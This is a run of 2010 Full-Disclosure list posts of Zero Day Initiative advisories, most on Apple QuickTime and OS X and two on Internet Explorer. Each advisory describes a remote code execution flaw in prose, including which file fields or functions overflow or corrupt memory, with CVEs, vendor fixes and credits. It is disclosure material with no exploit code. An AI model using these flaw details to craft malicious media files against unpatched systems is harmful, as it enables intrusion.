http://www.mozilla.org/security/announce/2010/mfsa2010-02.html -- Disclosure Timeline: 2009-12-04 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Orlando Barrera II, SecTheory -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-045: Apple QuickTime MPEG-1 genl Atom Remote Code Execution Vulnerability
ZDI-10-045: Apple QuickTime MPEG-1 genl Atom Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-045 April 2, 2010 -- CVE ID: CVE-2010-0526 -- Affected Vendors: Apple -- Affected Products: Apple OS X -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9629. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of MPEG content. Upon reading a field used for compression within a 'genl' atom in the movie container, the application will decompress outside the boundary of an allocated buffer. Successful exploitation can lead to code execution under the context of the application. -- Vendor Response: Apple states: http://support.apple.com/kb/HT4104 http://support.apple.com/kb/HT4077 -- Disclosure Timeline: 2009-11-06 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-044: Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability
ZDI-10-044: Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-044 April 2, 2010 -- CVE ID: CVE-2010-0520 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9628. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within QuickTimeAuthoring.qtx during the parsing of DELTA_FLI chunks stored within a malformed .fli file. The applications trusts a user-supplied length for decompression which can be modified to copy more data than necessary leading to a buffer overflow. Successful exploitation can lead to code execution under the context of the current user. -- Vendor Response: Apple states: http://support.apple.com/kb/HT4104 http://support.apple.com/kb/HT4070 -- Disclosure Timeline: 2009-11-06 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Moritz Jodeit of n.runs AG * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-043: Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability
ZDI-10-043: Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-043 April 2, 2010 -- CVE ID: CVE-2010-0519 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9569. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of a malformed SubImage Header Stream from a malicious FlashPix image. The application takes the NumberOfTiles field from this data structure, multiplies it by 16, and then uses it in an allocation. If this result is larger than 32-bits the value will wrap leading to an under-allocated buffer. Later when the application copies data into this buffer, a buffer overflow will occur leading to code execution within the context of the application. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4104 -- Disclosure Timeline: 2009-10-27 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-042: Apple QuickTime MediaVideo Compressor Name Remote Code Execution Vulnerability
ZDI-10-042: Apple QuickTime MediaVideo Compressor Name Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-042 April 2, 2010 -- CVE ID: CVE-2010-0528 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8443. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of malformed MediaVideo data from a sample description atom (STSD). The application will read a length from the file, subtract 1 and then use it as a counter for a loop. Certain values may cause memory corruption and can result in code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4104 -- Disclosure Timeline: 2009-08-20 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-041: Apple QuickTime QDM2/QDCA Atom Remote Code Execution Vulnerability
ZDI-10-041: Apple QuickTime QDM2/QDCA Atom Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-041 April 2, 2010 -- CVE ID: CVE-2010-0059 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9431. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the rendering of an audio stream utilizing QDesign's audio codec. The application will perform an allocation utilizing a field specified in the sample's description. Later when initializing the buffer, the application will utilize a different length. If the lengths differ, then a buffer overflow will occur. This can lead to code execution under the context of the currently logged in user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4077 -- Disclosure Timeline: 2009-08-10 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-040: Apple QuickTime RLE Bit Depth Remote Code Execution Vulnerability
ZDI-10-040: Apple QuickTime RLE Bit Depth Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-040 April 2, 2010 -- CVE ID: CVE-2010-0516 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8437. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of samples from a malformed .mov file utilizing the RLE codec. While decoding RLE data, the application will fail to validate the size when decompressing the data into a heap chunk. If the length is larger than the size of the chunk allocated, then a memory corruption will occur leading to code execution under the context of the currently logged in user. -- Vendor Response: -- Disclosure Timeline: 2009-08-10 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-039: Apple OS X Internet Enabled Disk Image Remote Code Execution Vulnerability
ZDI-10-039: Apple OS X Internet Enabled Disk Image Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-039 April 2, 2010 -- CVE ID: CVE-2010-0497 -- Affected Vendors: Apple -- Affected Products: Apple OS X -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8402. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple OS X. User interaction is required to exploit this vulnerability in that the target must open a malicious file. The specific flaw exists in the handling of internet enabled disk image files. When a specially crafted Menu Extras plugin is included in the disk image, it is executed without further interaction allowing for arbitrary code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4077 -- Disclosure Timeline: 2009-08-10 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Brian Mastenbrook -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-038: Apple QuickTime QDMC/QDM2 Remote Code Execution Vulnerability
ZDI-10-038: Apple QuickTime QDMC/QDM2 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-038 April 2, 2010 -- CVE ID: CVE-2010-0060 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9642. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists in the QuickTimeAudioSupport.qtx library when parsing malformed QDMC and QDM2 codec atoms. By modifying specific values within the stream an attacker can cause heap corruption which can lead to arbitrary code execution under the context of the currently logged in user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4077 -- Disclosure Timeline: 2009-09-22 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-037: Apple QuickTime MJPEG Sample Dimensions Remote Code Execution Vulnerability
ZDI-10-037: Apple QuickTime MJPEG Sample Dimensions Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-037 April 2, 2010 -- CVE ID: CVE-2010-0517 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8413. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists during the parsing of compressed mjpeg data from a malformed .mov file. The application will utilize the width and height fields in the file for calculating the size of a heap buffer. When copying into this buffer, the application will use a different field in the file to determine when to stop copying. If the first calculated length is smaller than the one used for decompression, a memory corruption will occur which can result in code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4077 -- Disclosure Timeline: 2009-07-14 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-036: Apple QuickTime H.263 PictureHeader Remote Code Execution Vulnerability
ZDI-10-036: Apple QuickTime H.263 PictureHeader Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-036 April 2, 2010 -- CVE ID: CVE-2010-0062 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8438. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within quicktime.qts when parsing sample data from a malformed .3g2 file that is utilizing the h.263 codec. While parsing data to render the video stream, the application will miscalculate the length of a buffer. Later when decompressing data to the heap chunk, the application will overflow the under allocated buffer leading to code execution under the context of the currently logged in user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4077 -- Disclosure Timeline: 2009-08-10 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-035: Apple QuickTime genl Atom Remote Code Execution Vulnerability
ZDI-10-035: Apple QuickTime genl Atom Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-035 April 2, 2010 -- CVE ID: CVE-2010-0526 -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8045. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime. User interaction is required to exploit this vulnerability in that the target must open a malicious file. The specific flaw exists in QuickTimeMPEG.qtx and results when QuickTime attempts to parse a malformed 'genl' atom that may be present in any QuickTime media file. A heap overflow is caused when QuickTime fails to perform proper bounds checking on the amount of data copied to the heap by a set of nested loops which can result in arbitrary code execution. -- Vendor Response: -- Disclosure Timeline: 2009-03-26 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-034: Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution Vulnerability
ZDI-10-034: Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-034 April 2, 2010 -- CVE ID: CVE-2010-0805 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9634. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer 6. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists within the Tabular Data Control ActiveX module. Specifically, if provided a malicious DataURL parameter a stack corruption may occur in the function CTDCCtl::SecurityCHeckDataURL. This can be leveraged to execute arbitrary code under the context of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx -- Disclosure Timeline: 2009-10-20 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-033: Microsoft Internet Explorer TIME2 Behavior Remote Code Execution Vulnerability
ZDI-10-033: Microsoft Internet Explorer TIME2 Behavior Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-033 April 2, 2010 -- CVE ID: CVE-2010-0492 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9632. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. The issue is located within the CTimeAction object. During handling of the TIME2 behavior, an attacker can trick the application into destroying the markup causing the application to reference memory that has previously been freed. Successful exploitation can lead to code execution under the context of the application. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx -- Disclosure Timeline: 2009-08-10 - Vulnerability reported to vendor 2010-04-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Simon Zuckerbraun -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security system
